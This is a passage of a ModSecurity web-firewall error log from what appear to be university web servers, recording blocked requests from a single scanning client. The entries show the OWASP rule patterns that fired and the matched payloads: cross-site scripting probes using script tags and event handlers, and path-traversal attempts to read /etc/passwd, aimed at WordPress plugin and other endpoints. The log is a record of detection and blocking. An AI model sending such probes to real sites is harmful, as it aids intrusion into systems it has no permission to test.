"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAjdQUYAAAAZ"]
[Tue Aug 29 11:51:24.916360 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15TMCo-f0AAAkyyE8AAAAW"]
[Tue Aug 29 11:51:24.918677 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAmQ-xQAAAAb"]
[Tue Aug 29 11:51:24.985623 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAmHd-AAAAAz"]
[Tue Aug 29 11:51:24.996808 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAkr0FwAAAAC"]
[Tue Aug 29 11:51:25.011201 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAmNp4oAAAAQ"]
[Tue Aug 29 11:51:25.015847 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAnHQeEAAAAT"]
[Tue Aug 29 11:51:25.607140 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAnIlgsAAAAV"]
[Tue Aug 29 11:51:25.640984 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TcCo-f0AAAmQ-xcAAAAb"]
[Tue Aug 29 11:51:26.662651 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAmHd-EAAAAz"]
[Tue Aug 29 11:51:26.689376 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAm-MdgAAAAI"]
[Tue Aug 29 11:51:26.692713 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAnHQeMAAAAT"]
[Tue Aug 29 11:51:26.732313 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAkyyFQAAAAW"]
[Tue Aug 29 11:51:26.780589 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAnTlKYAAAAA"]
[Tue Aug 29 11:51:26.784442 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAnHQeQAAAAT"]
[Tue Aug 29 11:51:26.787897 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAlIBiMAAAAn"]
[Tue Aug 29 11:51:26.788789 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAjdQUoAAAAZ"]
[Tue Aug 29 11:51:26.818904 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAlUliwAAAA0"]
[Tue Aug 29 11:51:26.829099 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAm80PIAAAAF"]
[Tue Aug 29 11:51:26.887852 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAm-MdoAAAAI"]
[Tue Aug 29 11:51:26.888517 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAlIBiQAAAAn"]
[Tue Aug 29 11:51:26.895664 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAjdQUsAAAAZ"]
[Tue Aug 29 11:51:26.897397 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15TsCo-f0AAAnB5VgAAAAJ"]
[Tue Aug 29 11:51:27.008259 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAfWOE8AAAAL"]
[Tue Aug 29 11:51:27.008262 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAnGkIoAAAAR"]
[Tue Aug 29 11:51:27.010640 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAnIlg4AAAAV"]
[Tue Aug 29 11:51:27.027628 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAnDFy4AAAAM"]
[Tue Aug 29 11:51:27.029070 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAkr0GIAAAAC"]
